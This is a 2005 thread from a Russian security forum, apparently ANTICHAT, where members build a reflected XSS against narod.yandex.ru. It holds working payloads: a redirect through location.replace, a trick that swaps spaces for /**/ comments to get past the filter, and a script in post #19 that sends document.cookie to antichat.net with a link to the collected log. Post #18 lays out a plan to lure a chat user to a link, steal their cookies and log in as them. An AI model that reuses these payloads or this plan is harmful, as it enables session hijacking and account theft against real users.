ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 22.09.2005, 20:48
vectorg
Постоянный
Регистрация: 07.08.2005
Сообщений: 386
Провел на форуме:
3212607

Репутация: 454
По умолчанию

Цитата:
Сообщение от Dmitro  
Подобных шалостей везде хватает, но на народе ))))
я даже и не думал, что всё так банально...


Как говорится темнее всего у фонаря...
да я и сам сначала сомневался, просто нада было прогу скачать с народовсково сайта, в адресе была очень интересная строчка, я сразу подумал что на таком то сайте фень не пройдёт, но мои ожидания не оправдались... )))))))))

Последний раз редактировалось VectorG; 22.09.2005 в 21:09..
 
Ответить с цитированием

  #12  
Старый 23.09.2005, 07:31
NIGHT_WOLF
Участник форума
Регистрация: 17.08.2005
Сообщений: 237
Провел на форуме:
1575267

Репутация: 27
Отправить сообщение для NIGHT_WOLF с помощью ICQ
По умолчанию

Скажите как её можно использовать ?
 
Ответить с цитированием

  #13  
Старый 23.09.2005, 13:34
*Van*
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
Провел на форуме:
670862

Репутация: 54
Отправить сообщение для *Van* с помощью ICQ
По умолчанию

Ага, а то у меня просто вылезло яндексуид и ещё что-то...Зачем это нужно?
 
Ответить с цитированием

  #14  
Старый 23.09.2005, 13:39
vectorg
Постоянный
Регистрация: 07.08.2005
Сообщений: 386
Провел на форуме:
3212607

Репутация: 454
По умолчанию

Цитата:
Сообщение от Ван  
Ага, а то у меня просто вылезло яндексуид и ещё что-то...Зачем это нужно?
попробуй через осла посмотреть

по ходу дела смысла от неё никакого... хотя если кто чё найдёт суйте сюда

Последний раз редактировалось VectorG; 23.09.2005 в 13:45..
 
Ответить с цитированием

  #15  
Старый 23.09.2005, 14:34
Kanick
Познающий
Регистрация: 06.09.2005
Сообщений: 67
Провел на форуме:
215526

Репутация: 85
Отправить сообщение для Kanick с помощью ICQ
По умолчанию

Обработчик обрезает до первого слэша, поэтому от закрывающей "</script>" остается лишь "<".

Ну так чего, я и не думал, что на Народе будут показываться Яндексовские куки! Это ведь огромный простор для снифферства и т.п.!

Последний раз редактировалось Kanick; 23.09.2005 в 22:05..
 
Ответить с цитированием

  #16  
Старый 23.09.2005, 14:41
vectorg
Постоянный
Регистрация: 07.08.2005
Сообщений: 386
Провел на форуме:
3212607

Репутация: 454
По умолчанию

насчёт слэша тоже не так всё просто, например такая бадья проходит:

http://narod.yandex.ru/100.xhtml?</font><script>location.replace('http://narod.ru')</script><font>

единственное пробелы не обрабатываются:
та же самая вставка картинки <img src=""> не проходит изза пробела, он в конечном случае идёт как %20 и весь код изпахабивается

Последний раз редактировалось VectorG; 23.09.2005 в 14:48..
 
Ответить с цитированием

  #17  
Старый 23.09.2005, 17:16
censored!
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258

Репутация: 648


По умолчанию

Цитата:
та же самая вставка картинки <img src=""> не проходит изза пробела, он в конечном случае идёт как %20 и весь код изпахабивается
пробел можешь комментом попробовать заменить: <img/**/src="">
__________________
+ (это не крестик, это плюсик!)
__________________


 
Ответить с цитированием

  #18  
Старый 23.09.2005, 18:06
vectorg
Постоянный
Регистрация: 07.08.2005
Сообщений: 386
Провел на форуме:
3212607

Репутация: 454
По умолчанию

Цитата:
Сообщение от censored!  
пробел можешь комментом попробовать заменить: <img/**/src="">
СПАСИБА!!!!! ВСЁ РАБОТАЕТ!!!!

у меня мысль такая, сидеть в чате на народе, дать челу ссылку на свой "супер мега сайт", когда он заходит на него, через location.replace делается перевод на страницу с xss со снифером, я беру куки, заменяю их, и сижу под его логином... по моему это слишком наивно ...)))) единственное с той страницы берётся всё кроме session_id, как её вытащить?

Последний раз редактировалось VectorG; 23.09.2005 в 20:54..
 
Ответить с цитированием

  #19  
Старый 23.09.2005, 22:32
Kanick
Познающий
Регистрация: 06.09.2005
Сообщений: 67
Провел на форуме:
215526

Репутация: 85
Отправить сообщение для Kanick с помощью ICQ
По умолчанию

Кстати, кто-нибудь может внятно ответить, почему IE 6 при вызове document.cookie выдает не все куки для данного домена? Чаще всего отсутствует тот, что содержит информацию о сессии.

Вот вам пример запроса:
http://narod.yandex.ru/100.xhtml?</font><script>img=new/**/Image;img.src="http://antichat.net/s/s.gif?"+document.cookie;</script><font>

Результат - http://antichat.net/s/log.php

Последний раз редактировалось Kanick; 23.09.2005 в 22:40..
 
Ответить с цитированием

  #20  
Старый 24.09.2005, 13:35
Abra
Постоянный
Регистрация: 17.09.2005
Сообщений: 375
Провел на форуме:
993362

Репутация: 175
По умолчанию

а никто не в курсе на народе пассы хешируются вообще? если да то чем? А то никогда там акка не имел.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Взлом чатов на народ.ру JamesBond Чаты 14 18.02.2005 01:49



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ